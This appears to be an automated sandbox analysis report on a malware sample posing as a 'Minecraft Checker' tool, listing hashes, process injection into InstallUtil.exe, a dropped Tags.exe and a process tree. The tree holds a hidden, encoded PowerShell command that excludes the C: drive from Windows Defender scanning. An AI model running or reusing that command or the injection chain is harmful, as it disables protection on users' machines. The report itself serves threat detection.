Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20230621-en -
resource tags
arch:x64arch:x86image:win7-20230621-enlocale:en-usos:windows7-x64system -
submitted
27-06-2023 16:08
Static task
static1
Behavioral task
behavioral1
Sample
Minecraft Checker by xRisky.exe
Resource
win7-20230621-en
Behavioral task
behavioral2
Sample
Minecraft Checker by xRisky.exe
Resource
win10v2004-20230621-en
General
-
Target
Minecraft Checker by xRisky.exe
-
Size
5.6MB
-
MD5
682fcac2b949bc9fcb3b039b2ddb5ff2
-
SHA1
94eb1e61b975c65f95c5519d0bfb128906c3dcbb
-
SHA256
029efceb46ffeaefe413209d52c458e22d444c6a67514ac6b0f015caa6e27c9e
-
SHA512
c2ebcff22f15873cf2f119e025eeeb081210ea07de4271758676490f1eb1dde82afd5750a800a8dbbde408ac7a6dc8f54e448fb4180bc4205ab67dc6ba1abd28
-
SSDEEP
98304:MQsAE8NRnJFKRhwnA8K8s0n2uiR3dN1mnRsMEZQ8kSZvIgi+1RWQ:zNVJFKP98K8sVR37knuWSpli+y
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 1388 Tags.exe 1172 Tags.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 1344 set thread context of 1332 1344 Minecraft Checker by xRisky.exe 29 PID 1388 set thread context of 1172 1388 Tags.exe 37 PID 1172 set thread context of 1916 1172 Tags.exe 39 PID 1916 set thread context of 324 1916 InstallUtil.exe 40 -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 1344 Minecraft Checker by xRisky.exe 1344 Minecraft Checker by xRisky.exe 484 powershell.exe 1388 Tags.exe 1172 Tags.exe 1172 Tags.exe 1172 Tags.exe 1172 Tags.exe 1916 InstallUtil.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 1344 Minecraft Checker by xRisky.exe Token: SeDebugPrivilege 1332 Minecraft Checker by xRisky.exe Token: SeDebugPrivilege 484 powershell.exe Token: SeDebugPrivilege 1388 Tags.exe Token: SeDebugPrivilege 1172 Tags.exe Token: SeDebugPrivilege 1916 InstallUtil.exe Token: SeDebugPrivilege 324 InstallUtil.exe -
Suspicious use of WriteProcessMemory 60 IoCs
description pid Process procid_target PID 1344 wrote to memory of 1296 1344 Minecraft Checker by xRisky.exe 28 PID 1344 wrote to memory of 1296 1344 Minecraft Checker by xRisky.exe 28 PID 1344 wrote to memory of 1296 1344 Minecraft Checker by xRisky.exe 28 PID 1344 wrote to memory of 1296 1344 Minecraft Checker by xRisky.exe 28 PID 1344 wrote to memory of 1332 1344 Minecraft Checker by xRisky.exe 29 PID 1344 wrote to memory of 1332 1344 Minecraft Checker by xRisky.exe 29 PID 1344 wrote to memory of 1332 1344 Minecraft Checker by xRisky.exe 29 PID 1344 wrote to memory of 1332 1344 Minecraft Checker by xRisky.exe 29 PID 1344 wrote to memory of 1332 1344 Minecraft Checker by xRisky.exe 29 PID 1344 wrote to memory of 1332 1344 Minecraft Checker by xRisky.exe 29 PID 1344 wrote to memory of 1332 1344 Minecraft Checker by xRisky.exe 29 PID 1344 wrote to memory of 1332 1344 Minecraft Checker by xRisky.exe 29 PID 1344 wrote to memory of 1332 1344 Minecraft Checker by xRisky.exe 29 PID 1768 wrote to memory of 484 1768 taskeng.exe 33 PID 1768 wrote to memory of 484 1768 taskeng.exe 33 PID 1768 wrote to memory of 484 1768 taskeng.exe 33 PID 432 wrote to memory of 1388 432 taskeng.exe 36 PID 432 wrote to memory of 1388 432 taskeng.exe 36 PID 432 wrote to memory of 1388 432 taskeng.exe 36 PID 432 wrote to memory of 1388 432 taskeng.exe 36 PID 1388 wrote to memory of 1172 1388 Tags.exe 37 PID 1388 wrote to memory of 1172 1388 Tags.exe 37 PID 1388 wrote to memory of 1172 1388 Tags.exe 37 PID 1388 wrote to memory of 1172 1388 Tags.exe 37 PID 1388 wrote to memory of 1172 1388 Tags.exe 37 PID 1388 wrote to memory of 1172 1388 Tags.exe 37 PID 1388 wrote to memory of 1172 1388 Tags.exe 37 PID 1388 wrote to memory of 1172 1388 Tags.exe 37 PID 1388 wrote to memory of 1172 1388 Tags.exe 37 PID 1172 wrote to memory of 840 1172 Tags.exe 38 PID 1172 wrote to memory of 840 1172 Tags.exe 38 PID 1172 wrote to memory of 840 1172 Tags.exe 38 PID 1172 wrote to memory of 840 1172 Tags.exe 38 PID 1172 wrote to memory of 840 1172 Tags.exe 38 PID 1172 wrote to memory of 840 1172 Tags.exe 38 PID 1172 wrote to memory of 840 1172 Tags.exe 38 PID 1172 wrote to memory of 1916 1172 Tags.exe 39 PID 1172 wrote to memory of 1916 1172 Tags.exe 39 PID 1172 wrote to memory of 1916 1172 Tags.exe 39 PID 1172 wrote to memory of 1916 1172 Tags.exe 39 PID 1172 wrote to memory of 1916 1172 Tags.exe 39 PID 1172 wrote to memory of 1916 1172 Tags.exe 39 PID 1172 wrote to memory of 1916 1172 Tags.exe 39 PID 1172 wrote to memory of 1916 1172 Tags.exe 39 PID 1172 wrote to memory of 1916 1172 Tags.exe 39 PID 1172 wrote to memory of 1916 1172 Tags.exe 39 PID 1172 wrote to memory of 1916 1172 Tags.exe 39 PID 1172 wrote to memory of 1916 1172 Tags.exe 39 PID 1916 wrote to memory of 324 1916 InstallUtil.exe 40 PID 1916 wrote to memory of 324 1916 InstallUtil.exe 40 PID 1916 wrote to memory of 324 1916 InstallUtil.exe 40 PID 1916 wrote to memory of 324 1916 InstallUtil.exe 40 PID 1916 wrote to memory of 324 1916 InstallUtil.exe 40 PID 1916 wrote to memory of 324 1916 InstallUtil.exe 40 PID 1916 wrote to memory of 324 1916 InstallUtil.exe 40 PID 1916 wrote to memory of 324 1916 InstallUtil.exe 40 PID 1916 wrote to memory of 324 1916 InstallUtil.exe 40 PID 1916 wrote to memory of 324 1916 InstallUtil.exe 40 PID 1916 wrote to memory of 324 1916 InstallUtil.exe 40 PID 1916 wrote to memory of 324 1916 InstallUtil.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\Minecraft Checker by xRisky.exe"C:\Users\Admin\AppData\Local\Temp\Minecraft Checker by xRisky.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Users\Admin\AppData\Local\Temp\Minecraft Checker by xRisky.exe"C:\Users\Admin\AppData\Local\Temp\Minecraft Checker by xRisky.exe"2⤵PID:1296
-
-
C:\Users\Admin\AppData\Local\Temp\Minecraft Checker by xRisky.exe"C:\Users\Admin\AppData\Local\Temp\Minecraft Checker by xRisky.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1332
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {5525A07E-CD15-4DC4-81AA-8C441A7E49F3} S-1-5-21-3297628651-743815474-1126733160-1000:HHVWDVKF\Admin:S4U:1⤵
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:484
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {6F869B97-0386-435F-AC24-9D244A6DFFAE} S-1-5-21-3297628651-743815474-1126733160-1000:HHVWDVKF\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:432 -
C:\Users\Admin\AppData\Local\SecurityZone\loeim\Tags.exeC:\Users\Admin\AppData\Local\SecurityZone\loeim\Tags.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1388 -
C:\Users\Admin\AppData\Local\SecurityZone\loeim\Tags.exeC:\Users\Admin\AppData\Local\SecurityZone\loeim\Tags.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe4⤵PID:840
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe5⤵
- Suspicious use of AdjustPrivilegeToken
PID:324
-
-
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.6MB
MD5682fcac2b949bc9fcb3b039b2ddb5ff2
SHA194eb1e61b975c65f95c5519d0bfb128906c3dcbb
SHA256029efceb46ffeaefe413209d52c458e22d444c6a67514ac6b0f015caa6e27c9e
SHA512c2ebcff22f15873cf2f119e025eeeb081210ea07de4271758676490f1eb1dde82afd5750a800a8dbbde408ac7a6dc8f54e448fb4180bc4205ab67dc6ba1abd28
-
Filesize
5.6MB
MD5682fcac2b949bc9fcb3b039b2ddb5ff2
SHA194eb1e61b975c65f95c5519d0bfb128906c3dcbb
SHA256029efceb46ffeaefe413209d52c458e22d444c6a67514ac6b0f015caa6e27c9e
SHA512c2ebcff22f15873cf2f119e025eeeb081210ea07de4271758676490f1eb1dde82afd5750a800a8dbbde408ac7a6dc8f54e448fb4180bc4205ab67dc6ba1abd28
-
Filesize
5.6MB
MD5682fcac2b949bc9fcb3b039b2ddb5ff2
SHA194eb1e61b975c65f95c5519d0bfb128906c3dcbb
SHA256029efceb46ffeaefe413209d52c458e22d444c6a67514ac6b0f015caa6e27c9e
SHA512c2ebcff22f15873cf2f119e025eeeb081210ea07de4271758676490f1eb1dde82afd5750a800a8dbbde408ac7a6dc8f54e448fb4180bc4205ab67dc6ba1abd28